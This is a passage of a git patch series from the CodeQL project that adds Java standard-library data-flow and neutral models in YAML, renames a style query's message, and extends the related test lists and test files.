use | - not existsArgument.getType().getASuperType+() = c.getTarget().getParameterType(argPos) + existsArgument.getType() = c.getTarget().getParameterType(argPos).getASuperType*() ) -select existsArgument, "This exists argument can be omitted by using a don't-care expression $@.", +select existsArgument, "This exists variable can be omitted by using a don't-care expression $@.", use, "in this argument" diff --git a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected index 4989ce68927..3031b67920f 100644 --- a/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected +++ b/ql/ql/test/queries/style/OmittableExists/OmittableExists.expected @@ -1 +1 @@ -| Test.qll:10:10:10:14 | i | This exists argument can be omitted by using a don't-care expression $@. | Test.qll:10:29:10:29 | i | in this argument | +| Test.qll:10:10:10:14 | i | This exists variable can be omitted by using a don't-care expression $@. | Test.qll:10:29:10:29 | i | in this argument | From 7d0018c897cafee39346a01b74c8ae02058966f1 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Wed, 21 Dec 2022 17:16:34 +0100 Subject: [PATCH 052/381] Update ql/ql/src/queries/style/OmittableExists.ql --- ql/ql/src/queries/style/OmittableExists.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/ql/src/queries/style/OmittableExists.ql b/ql/ql/src/queries/style/OmittableExists.ql index 8632eb88919..f3a3406c1f2 100644 --- a/ql/ql/src/queries/style/OmittableExists.ql +++ b/ql/ql/src/queries/style/OmittableExists.ql @@ -1,5 +1,5 @@ /** - * @name Omittable 'exists' argument + * @name Omittable 'exists' variable * @description Writing 'exists(x | pred(x))' is bad practice and can be omitted. * @kind problem * @problem.severity warning From 99ddd484be583b4a82a074de732a363adbfd3d2e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:34:26 -0500 Subject: [PATCH 053/381] Java: add java.io models --- java/ql/lib/ext/java.io.model.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/java/ql/lib/ext/java.io.model.yml b/java/ql/lib/ext/java.io.model.yml index 87d6c6311e7..94497412c07 100644 --- a/java/ql/lib/ext/java.io.model.yml +++ b/java/ql/lib/ext/java.io.model.yml @@ -74,6 +74,7 @@ extensions: - ["java.io", "InputStream", True, "readNBytes", "(int)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "InputStream", True, "transferTo", "(OutputStream)", "", "Argument[-1]", "Argument[0]", "taint", "manual"] - ["java.io", "InputStreamReader", False, "InputStreamReader", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["java.io", "IOException", False, "IOException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - ["java.io", "ObjectInput", True, "read", "", "", "Argument[-1]", "Argument[0]", "taint", "manual"] - ["java.io", "ObjectInputStream", False, "ObjectInputStream", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.io", "OutputStream", True, "write", "(byte[])", "", "Argument[0]", "Argument[-1]", "taint", "manual"] @@ -84,3 +85,10 @@ extensions: - ["java.io", "StringReader", False, "StringReader", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.io", "Writer", True, "toString", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.io", "Writer", True, "write", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.io", "File", "exists", "()", "manual"] + - ["java.io", "File", "getName", "()", "manual"] # ! might need to double-check this one From ed534b06d55af7878020c6777829844c6de702fd Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:45:12 -0500 Subject: [PATCH 054/381] Java: add java.lang models --- java/ql/lib/ext/java.lang.model.yml | 26 ++++++++++++++++++++++++-- 1 file changed, 24 insertions(+), 2 deletions(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index 9550c9e139d..a2f8fd3c65e 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -37,16 +37,26 @@ extensions: - ["java.lang", "CharSequence", True, "charAt", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "CharSequence", True, "subSequence", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "CharSequence", True, "toString", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Exception", False, "Exception", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] + - ["java.lang", "IndexOutOfBoundsException", False, "IndexOutOfBoundsException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] + - ["java.lang", "Integer", False, "intValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Integer", False, "toString", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Integer", False, "valueOf", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "IllegalArgumentException", False, "IllegalArgumentException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - ["java.lang", "IllegalStateException", False, "IllegalStateException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] - ["java.lang", "Integer", False, "parseInt", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "Iterable", True, "forEach", "(Consumer)", "", "Argument[-1].Element", "Argument[0].Parameter[0]", "value", "manual"] - ["java.lang", "Iterable", True, "iterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.lang", "Iterable", True, "spliterator", "()", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] + - ["java.lang", "Long", False, "longValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Long", False, "parseLong", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Long", False, "toString", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].MapKey", "ReturnValue.MapKey", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].MapValue", "ReturnValue.MapValue", "value", "manual"] - ["java.lang", "RuntimeException", False, "RuntimeException", "(String)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] + - ["java.lang", "RuntimeException", False, "RuntimeException", "(String,Throwable)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "value", "manual"] + - ["java.lang", "RuntimeException", False, "RuntimeException", "(String,Throwable)", "", "Argument[1]", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "value", "manual"] - ["java.lang", "RuntimeException", False, "RuntimeException", "(Throwable)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "value", "manual"] - ["java.lang", "String", False, "String", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "String", False, "concat", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] @@ -88,33 +98,45 @@ extensions: - ["java.lang", "String", False, "valueOf", "(char[])", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "valueOf", "(char[],int,int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "String", False, "valueOf", "(int)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.lang", "String", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "StringBuffer", True, "StringBuffer", "(CharSequence)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuffer", True, "StringBuffer", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "StringBuilder", True, "StringBuilder", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.lang", "System", False, "arraycopy", "", "", "Argument[0]", "Argument[2]", "taint", "manual"] + - ["java.lang", "System", False, "getProperty", "(String)", "", "Argument[-1].MapValue", "ReturnValue", "value", "manual"] - ["java.lang", "Throwable", False, "Throwable", "(Throwable)", "", "Argument[0]", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "value", "manual"] - - ["java.lang", "Throwable", False, "getCause", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "ReturnValue", "value", "manual"] - - ["java.lang", "Throwable", False, "getMessage", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "ReturnValue", "value", "manual"] + - ["java.lang", "Throwable", True, "getCause", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.cause]", "ReturnValue", "value", "manual"] + - ["java.lang", "Throwable", True, "getMessage", "()", "", "Argument[-1].SyntheticField[java.lang.Throwable.message]", "ReturnValue", "value", "manual"] - addsTo: pack: codeql/java-all extensible: neutralModel data: + - ["java.lang", "AbstractStringBuilder", "length", "()", "manual"] + - ["java.lang", "Boolean", "equals", "(Object)", "manual"] + - ["java.lang", "Class", "getClassLoader", "()", "manual"] # ! might need to double-check this one - ["java.lang", "Class", "getName", "()", "manual"] - ["java.lang", "Class", "getSimpleName", "()", "manual"] + - ["java.lang", "Class", "isAssignableFrom", "(Class)", "manual"] - ["java.lang", "Enum", "Enum", "(String,int)", "manual"] - ["java.lang", "Enum", "equals", "(Object)", "manual"] - ["java.lang", "Enum", "name", "()", "manual"] - ["java.lang", "Enum", "toString", "()", "manual"] + - ["java.lang", "Long", "equals", "(Object)", "manual"] - ["java.lang", "Object", "equals", "(Object)", "manual"] - ["java.lang", "Object", "getClass", "()", "manual"] - ["java.lang", "Object", "hashCode", "()", "manual"] - ["java.lang", "Object", "toString", "()", "manual"] - ["java.lang", "String", "contains", "(CharSequence)", "manual"] + - ["java.lang", "String", "endsWith", "(String)", "manual"] - ["java.lang", "String", "equals", "(Object)", "manual"] - ["java.lang", "String", "equalsIgnoreCase", "(String)", "manual"] - ["java.lang", "String", "hashCode", "()", "manual"] + - ["java.lang", "String", "indexOf", "(String)", "manual"] - ["java.lang", "String", "isEmpty", "()", "manual"] - ["java.lang", "String", "length", "()", "manual"] - ["java.lang", "String", "startsWith", "(String)", "manual"] - ["java.lang", "System", "currentTimeMillis", "()", "manual"] + - ["java.lang", "System", "nanoTime", "()", "manual"] + - ["java.lang", "Thread", "currentThread", "()", "manual"] + - ["java.lang", "Thread", "sleep", "(long)", "manual"] From 1544f49f91405dd849876ad17b26edfd446b8de3 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:47:32 -0500 Subject: [PATCH 055/381] Java: add java.math models --- java/ql/lib/ext/java.math.model.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/java/ql/lib/ext/java.math.model.yml b/java/ql/lib/ext/java.math.model.yml index e491982b818..1dc8b8b0eea 100644 --- a/java/ql/lib/ext/java.math.model.yml +++ b/java/ql/lib/ext/java.math.model.yml @@ -4,3 +4,12 @@ extensions: extensible: summaryModel data: - ["java.math", "BigDecimal", False, "BigDecimal", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] # ! consider making this signatureless and merging with the below line instead + - ["java.math", "BigDecimal", False, "valueOf", "(double)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Math", False, "min", "(int,int)", "", "Argument[0..1]", "ReturnValue", "value", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.math", "BigDecimal", "compareTo", "(BigDecimal)", "manual"] From b9ce588076cc889ea1c712224f032ff6ef57188b Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:49:29 -0500 Subject: [PATCH 056/381] Java: add java.sql models --- java/ql/lib/ext/java.sql.model.yml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/java/ql/lib/ext/java.sql.model.yml b/java/ql/lib/ext/java.sql.model.yml index 3a377361417..83fe8f73c02 100644 --- a/java/ql/lib/ext/java.sql.model.yml +++ b/java/ql/lib/ext/java.sql.model.yml @@ -19,4 +19,13 @@ extensions: pack: codeql/java-all extensible: summaryModel data: + - ["java.sql", "PreparedStatement", True, "setInt", "(int,int)", "", "Argument[1]", "Argument[-1].Parameter[Argument[0]]", "value", "manual"] # ! fix output + - ["java.sql", "PreparedStatement", True, "setString", "(int,String)", "", "Argument[1]", "Argument[-1].Parameter[Argument[0]]", "value", "manual"] # ! fix output + - ["java.sql", "ResultSet", True, "getInt", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.sql", "ResultSet", True, "getString", "(String)", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.sql", "ResultSet", "next", "()", "manual"] From 8e20aeb314376ab86f7802aafec3a3b6d1cfb9ed Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:51:44 -0500 Subject: [PATCH 057/381] Java: add java.text models --- java/ql/lib/ext/java.text.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 java/ql/lib/ext/java.text.model.yml diff --git a/java/ql/lib/ext/java.text.model.yml b/java/ql/lib/ext/java.text.model.yml new file mode 100644 index 00000000000..edf2a4c7d60 --- /dev/null +++ b/java/ql/lib/ext/java.text.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.text", "DateFormat", "format", "(Date)", "manual"] + - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] From cfe075ef546004cfabda3e3c0662a90f010e39c7 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:54:35 -0500 Subject: [PATCH 058/381] Java: add java.time models --- java/ql/lib/ext/java.time.model.yml | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 java/ql/lib/ext/java.time.model.yml diff --git a/java/ql/lib/ext/java.time.model.yml b/java/ql/lib/ext/java.time.model.yml new file mode 100644 index 00000000000..1a9b745f403 --- /dev/null +++ b/java/ql/lib/ext/java.time.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.time", "Instant", "now", "()", "manual"] + - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] + - ["java.time", "ZonedDateTime", "now", "()", "manual"] From db0d24fdd13803532c22715a1c6a631134e59f48 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:57:22 -0500 Subject: [PATCH 059/381] Java: add java.util.concurrent.atomic models --- java/ql/lib/ext/java.util.concurrent.atomic.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 java/ql/lib/ext/java.util.concurrent.atomic.model.yml diff --git a/java/ql/lib/ext/java.util.concurrent.atomic.model.yml b/java/ql/lib/ext/java.util.concurrent.atomic.model.yml new file mode 100644 index 00000000000..bf56a6dbb92 --- /dev/null +++ b/java/ql/lib/ext/java.util.concurrent.atomic.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/java-all + extensible: summaryModel + data: + - ["java.util.concurrent.atomic", "AtomicInteger", False, "get", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicInteger.value]", "ReturnValue", "value", "manual"] + - ["java.util.concurrent.atomic", "AtomicReference", False, "get", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.atomic.AtomicReference.value]", "ReturnValue", "value", "manual"] From a8c55ee4b7e296ed2225316e4cffc511b09a149e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:59:00 -0500 Subject: [PATCH 060/381] Java: add java.util.concurrent models --- java/ql/lib/ext/java.util.concurrent.model.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/java/ql/lib/ext/java.util.concurrent.model.yml b/java/ql/lib/ext/java.util.concurrent.model.yml index 9c202220dde..bfffc342558 100644 --- a/java/ql/lib/ext/java.util.concurrent.model.yml +++ b/java/ql/lib/ext/java.util.concurrent.model.yml @@ -18,6 +18,14 @@ extensions: - ["java.util.concurrent", "BlockingQueue", True, "put", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util.concurrent", "BlockingQueue", True, "take", "()", "", "Argument[-1].Element", "ReturnValue", "value", "manual"] - ["java.util.concurrent", "ConcurrentHashMap", True, "elements", "()", "", "Argument[-1].MapValue", "ReturnValue.Element", "value", "manual"] + - ["java.util.concurrent", "CountDownLatch", False, "CountDownLatch", "(int)", "", "Argument[0]", "Argument[-1].SyntheticField[java.util.concurrent.CountDownLatch.count]", "value", "manual"] + - ["java.util.concurrent", "CountDownLatch", False, "getCount", "()", "", "Argument[-1].SyntheticField[java.util.concurrent.CountDownLatch.count]", "ReturnValue", "value", "manual"] - ["java.util.concurrent", "TransferQueue", True, "transfer", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util.concurrent", "TransferQueue", True, "tryTransfer", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util.concurrent", "TransferQueue", True, "tryTransfer", "(Object,long,TimeUnit)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.util.concurrent", "CountDownLatch", "countDown", "()", "manual"] From 573de924415c7791cbb73209f9b74c5827e0ed43 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 12:59:58 -0500 Subject: [PATCH 061/381] Java: add java.util.function models --- java/ql/lib/ext/java.util.function.model.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/java/ql/lib/ext/java.util.function.model.yml b/java/ql/lib/ext/java.util.function.model.yml index 9a608462a92..44c01b611d2 100644 --- a/java/ql/lib/ext/java.util.function.model.yml +++ b/java/ql/lib/ext/java.util.function.model.yml @@ -4,3 +4,16 @@ extensions: extensible: sinkModel data: - ["java.util.function", "Predicate", False, "test", "(Object)", "", "Argument[-1]", "regex-use[0]", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: summaryModel + data: + - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["java.util.function", "Supplier", False, "get", "()", "", "Argument[-1]", "ReturnValue", "value", "manual"] + + - addsTo: + pack: codeql/java-all + extensible: neutralModel + data: + - ["java.util.function", "Consumer", "accept", "(Object)", "manual"] From 1db829e55c0ba393835c494ee7df2170775de82e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 13:03:57 -0500 Subject: [PATCH 062/381] Java: add java.util models --- java/ql/lib/ext/java.util.model.yml | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/java/ql/lib/ext/java.util.model.yml b/java/ql/lib/ext/java.util.model.yml index c0de6b67db5..224a425a8d8 100644 --- a/java/ql/lib/ext/java.util.model.yml +++ b/java/ql/lib/ext/java.util.model.yml @@ -335,6 +335,7 @@ extensions: - ["java.util", "Stack", True, "peek", "()", "", "Argument[-1].Element", "ReturnValue", "value", "manual"] - ["java.util", "Stack", True, "pop", "()", "", "Argument[-1].Element", "ReturnValue", "value", "manual"] - ["java.util", "Stack", True, "push", "(Object)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] + - ["java.util", "StringJoiner", False, "add", "(CharSequence)", "", "Argument[0]", "Argument[-1].Element", "value", "manual"] - ["java.util", "StringTokenizer", False, "StringTokenizer", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.util", "StringTokenizer", False, "nextElement", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.util", "StringTokenizer", False, "nextToken", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] @@ -360,17 +361,27 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.util", "Collections", "emptyList", "()", "manual"] + - ["java.util", "ArrayList", "ArrayList", "(int)", "manual"] + - ["java.util", "ArrayList", "size", "()", "manual"] + - ["java.util", "Collection", "isEmpty", "()", "manual"] - ["java.util", "Collection", "size", "()", "manual"] + - ["java.util", "Collections", "emptyList", "()", "manual"] + - ["java.util", "Collections", "emptyMap", "()", "manual"] + - ["java.util", "Collections", "emptySet", "()", "manual"] + - ["java.util", "Date", "Date", "(long)", "manual"] + - ["java.util", "Date", "getTime", "()", "manual"] - ["java.util", "Iterator", "hasNext", "()", "manual"] + - ["java.util", "List", "clear", "()", "manual"] - ["java.util", "List", "contains", "(Object)", "manual"] - ["java.util", "List", "isEmpty", "()", "manual"] - ["java.util", "List", "size", "()", "manual"] + - ["java.util", "Map", "clear", "()", "manual"] - ["java.util", "Map", "containsKey", "(Object)", "manual"] - ["java.util", "Map", "isEmpty", "()", "manual"] - ["java.util", "Map", "size", "()", "manual"] - ["java.util", "Objects", "equals", "(Object,Object)", "manual"] - ["java.util", "Objects", "hash", "(Object[])", "manual"] + - ["java.util", "Objects", "nonNull", "(Object)", "manual"] - ["java.util", "Optional", "empty", "()", "manual"] - ["java.util", "Optional", "isPresent", "()", "manual"] - ["java.util", "Set", "contains", "(Object)", "manual"] From 16de30e07e3d8e8d5e01ed8e7b78d28c7dcff280 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 13:05:23 -0500 Subject: [PATCH 063/381] Java: add java.util.stream models --- java/ql/lib/ext/java.util.stream.model.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/java/ql/lib/ext/java.util.stream.model.yml b/java/ql/lib/ext/java.util.stream.model.yml index 12367a7b620..aae79ed57ac 100644 --- a/java/ql/lib/ext/java.util.stream.model.yml +++ b/java/ql/lib/ext/java.util.stream.model.yml @@ -92,4 +92,7 @@ extensions: pack: codeql/java-all extensible: neutralModel data: + - ["java.util.stream", "Collectors", "joining", "(CharSequence)", "manual"] - ["java.util.stream", "Collectors", "toList", "()", "manual"] + - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] + - ["java.util.stream", "Collectors", "toSet", "()", "manual"] From c251da799fd3908fb7b17b9d9eb88c237820bcd1 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 13:19:09 -0500 Subject: [PATCH 064/381] Java: update TopJdkApis test --- java/ql/test/ext/TopJdkApis/TopJdkApis.qll | 56 ++++++++++++++++++- .../test/ext/TopJdkApis/TopJdkApisTest.java | 13 +++++ 2 files changed, 68 insertions(+), 1 deletion(-) diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll index 76892845054..dca6afb4035 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApis.qll +++ b/java/ql/test/ext/TopJdkApis/TopJdkApis.qll @@ -57,7 +57,61 @@ predicate topJdkApiName(string apiName) { "java.nio.file.Path#resolve(String)", "java.lang.Enum#toString()", "java.lang.RuntimeException#RuntimeException(Throwable)", "java.util.Collection#size()", "java.lang.String#charAt(int)", "java.util.stream.Stream#forEach(Consumer)", - "java.util.Map#isEmpty()", "java.lang.String#valueOf(int)" + "java.util.Map#isEmpty()", "java.lang.String#valueOf(int)", + // top 200 JDK APIs + "java.lang.Integer#intValue()", "java.util.ArrayList#size()", + "java.util.ArrayList#ArrayList(int)", "java.util.function.Function#apply(Object)", + "java.util.stream.Stream#forEach(Consumer)", "java.util.ArrayList#get(int)", + "java.util.Set#iterator()", "java.util.stream.Collectors#toSet()", + "java.lang.String#replaceAll(String,String)", "java.lang.String#getBytes(Charset)", + "java.util.Objects#requireNonNull(Object)", "java.util.Objects#nonNull(Object)", + "java.lang.String#endsWith(String)", "java.lang.AbstractStringBuilder#length()", + "java.sql.PreparedStatement#setString(int,String)", + "java.util.regex.Pattern#matcher(CharSequence)", "java.nio.file.Path#toString()", + "java.time.Instant#now()", "java.io.File#getAbsolutePath()", + "java.util.Set#addAll(Collection)", "java.lang.Integer#valueOf(int)", + "java.util.HashSet#HashSet(Collection)", "java.lang.Integer#toString(int)", + "java.lang.StringBuilder#StringBuilder(String)", "java.lang.Thread#sleep(long)", + "java.lang.Thread#currentThread()", "java.util.Date#getTime()", + "java.io.Writer#write(String)", "java.lang.String#getBytes()", "java.io.File#exists()", + "java.lang.String#toUpperCase()", "java.lang.Long#parseLong(String)", + "java.util.Collections#emptyMap()", "java.util.Optional#orElseThrow(Supplier)", + "java.util.List#of(Object,Object)", "java.util.concurrent.CountDownLatch#countDown()", + "java.lang.Class#isAssignableFrom(Class)", + "java.lang.IndexOutOfBoundsException#IndexOutOfBoundsException(String)", + "java.lang.Throwable#getCause()", "java.util.Arrays#stream(Object[])", + "java.util.function.Supplier#get()", "java.lang.Exception#Exception(String)", + "java.util.function.Consumer#accept(Object)", "java.util.stream.Stream#anyMatch(Predicate)", + "java.util.List#clear()", "java.io.File#File(File,String)", + "java.lang.String#indexOf(String)", "java.util.List#iterator()", + "java.util.concurrent.CountDownLatch#CountDownLatch(int)", "java.sql.ResultSet#next()", + "java.sql.PreparedStatement#setInt(int,int)", + "java.util.concurrent.atomic.AtomicInteger#get()", + "java.util.stream.Collectors#toMap(Function,Function)", "java.lang.Math#min(int,int)", + "java.lang.Long#equals(Object)", "java.util.Properties#setProperty(String,String)", + "java.util.Map#getOrDefault(Object,Object)", "java.lang.System#getProperty(String)", + "java.util.stream.Stream#of(Object[])", "java.nio.file.Paths#get(String,String[])", + "java.math.BigDecimal#compareTo(BigDecimal)", "java.math.BigDecimal#valueOf(long)", + "java.lang.RuntimeException#RuntimeException(String,Throwable)", + "java.util.Collection#add(Object)", "java.util.Collections#emptySet()", + "java.util.stream.Stream#flatMap(Function)", + "java.util.concurrent.atomic.AtomicReference#get()", "java.util.Collection#isEmpty()", + "java.lang.StringBuffer#toString()", "java.util.Collections#singleton(Object)", + "java.io.File#getName()", "java.time.ZonedDateTime#now()", + "java.io.ByteArrayInputStream#ByteArrayInputStream(byte[])", "java.nio.file.Path#toFile()", + "java.util.Date#Date(long)", "java.lang.System#nanoTime()", + "java.util.Hashtable#put(Object,Object)", "java.util.Map#putAll(Map)", + "java.lang.Long#toString()", "java.util.List#toArray(Object[])", "java.io.File#toPath()", + "java.util.regex.Matcher#group(int)", "java.time.LocalDate#of(int,int,int)", + "java.lang.String#valueOf(long)", "java.math.BigDecimal#valueOf(double)", + "java.io.IOException#IOException(String)", "java.text.DateFormat#format(Date)", + "java.sql.ResultSet#getInt(String)", "java.util.Map#clear()", "java.util.HashSet#add(Object)", + "java.lang.Class#getClassLoader()", "java.lang.Boolean#equals(Object)", + "java.lang.String#concat(String)", "java.util.Collections#singletonMap(Object,Object)", + "java.util.Collection#iterator()", "java.util.Map#computeIfAbsent(Object,Function)", + "java.text.SimpleDateFormat#SimpleDateFormat(String)", + "java.util.StringJoiner#add(CharSequence)", "java.lang.Long#longValue()", + "java.util.stream.Collectors#joining(CharSequence)" ] } diff --git a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java index 42779c6d8c1..4b7e60c6c9e 100644 --- a/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java +++ b/java/ql/test/ext/TopJdkApis/TopJdkApisTest.java @@ -6,9 +6,22 @@ import java.util.UUID; import java.util.stream.Collectors; import java.util.Map; import java.util.HashMap; +import java.util.HashSet; +import java.util.StringJoiner; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicReference; +import java.util.regex.Matcher; +import java.util.regex.Pattern; import java.math.BigDecimal; import java.sql.ResultSet; import java.lang.System; import java.lang.IllegalStateException; +import java.lang.IndexOutOfBoundsException; +import java.lang.Math; +import java.io.ByteArrayInputStream; +import java.nio.file.Paths; +import java.text.DateFormat; +import java.text.SimpleDateFormat; public class TopJdkApisTest { } From de5965525f1992ad72fb5b989de6d2eb5eaa488d Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Wed, 21 Dec 2022 16:19:17 -0500 Subject: [PATCH 065/381] Java: add initial test cases for summary models --- java/ql/test/ext/TestModels/Test.java | 143 +++++++++++++++++++++----- 1 file changed, 120 insertions(+), 23 deletions(-) diff --git a/java/ql/test/ext/TestModels/Test.java b/java/ql/test/ext/TestModels/Test.java index e2b681e9092..50558b89ac0 100644 --- a/java/ql/test/ext/TestModels/Test.java +++ b/java/ql/test/ext/TestModels/Test.java @@ -1,5 +1,15 @@ -import java.math.BigDecimal; +import java.sql.PreparedStatement; +import java.sql.DriverManager; +import java.sql.Connection; import java.sql.ResultSet; +import java.math.BigDecimal; +import java.io.IOException; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicReference; +import java.util.concurrent.CountDownLatch; +import java.util.function.Function; +import java.util.function.Supplier; +import java.util.StringJoiner; public class Test { @@ -9,37 +19,124 @@ public class Test { public void test() throws Exception { - Exception e1 = new RuntimeException((String)source()); - sink((String)e1.getMessage()); // $hasValueFlow + // top 100 JDK APIs tests + { + Exception e1 = new RuntimeException((String)source()); + sink((String)e1.getMessage()); // $hasValueFlow - Exception e2 = new RuntimeException((Throwable)source()); - sink((Throwable)e2.getCause()); // $hasValueFlow + Exception e2 = new RuntimeException((Throwable)source()); + sink((Throwable)e2.getCause()); // $hasValueFlow - Exception e3 = new 